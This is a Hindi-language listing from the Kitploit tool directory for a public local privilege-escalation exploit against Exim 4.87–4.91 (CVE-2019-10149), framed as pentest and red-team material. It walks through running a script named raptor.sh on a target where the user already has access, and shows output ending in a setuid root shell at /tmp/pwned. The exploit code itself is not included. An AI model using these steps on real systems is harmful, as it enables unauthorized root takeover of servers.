Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-10149-Exim4-RCE — स्थानीय विशेषाधिकार वृद्धि शोषण Exim 4.87-4.91 (CVE-2019-10149) के लिए। निर्मित SMTP कमांड के माध्यम से एक setuid रूट शेल हेल्पर प्रदान करता है, जो सामान्य उपयोगकर्ता से रूट तक विशेषाधिकार वृद्धि को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/cybersrmutl/cve-2019-10149-exim4-rce
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubcybersrmutl/cve-2019-10149-exim4-rce

CVE-2019-10149-Exim4-RCE

स्थानीय विशेषाधिकार वृद्धि शोषण Exim 4.87-4.91 (CVE-2019-10149) के लिए। निर्मित SMTP कमांड के माध्यम से एक setuid रूट शेल हेल्पर प्रदान करता है, जो सामान्य उपयोगकर्ता से रूट तक विशेषाधिकार वृद्धि को सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

Cr.Exim 4.87 - 4.91 - स्थानीय विशेषाधिकार वृद्धि

Cr.Link: https://www.exploit-db.com/exploits/46996

#1.इस विधि के लिए आपको पहले लक्ष्य मशीन तक मानक उपयोगकर्ता विशेषाधिकारों के साथ पहुंच प्राप्त करनी होगी।

#2.एक बार जब आप लक्ष्य मशीन तक पहुंच प्राप्त कर लें, तो निम्नलिखित सामग्री के साथ एक स्क्रिप्ट फ़ाइल बनाएँ:

vi raptor.sh

#3.प्रदान की गई 'raptor.sh' फ़ाइल से कोड कॉपी करें। फिर, फ़ाइल को निम्नलिखित कमांड का उपयोग करके निष्पादित करें:

chmod +x raptor.sh

./raptor.sh

#4.आपको नीचे दिए गए उदाहरण के समान आउटपुट प्राप्त होना चाहिए:

Preparing setuid shell helper...

Delivering payload...

220 machine-noob

ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000

250 machine-noob

Hello localhost [127.0.0.1]

250 OK

250 Accepted

354 Enter message, ending with "." on a line by itself

250 OK id=1vQiEr-00001R-7t

221 machine-noob

closing connection

Waiting 5 seconds for Exim to execute payload...

-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned

#5.अगला, निम्नलिखित कमांड निष्पादित करें:

/tmp/pwned

#6.फिर, 'id' कमांड चलाने का प्रयास करें। यदि आप निम्नलिखित परिणाम देखते हैं:

uid=0(root) gid=0(root) groups=0(root),1001(noob)

टूल डाउनलोड करें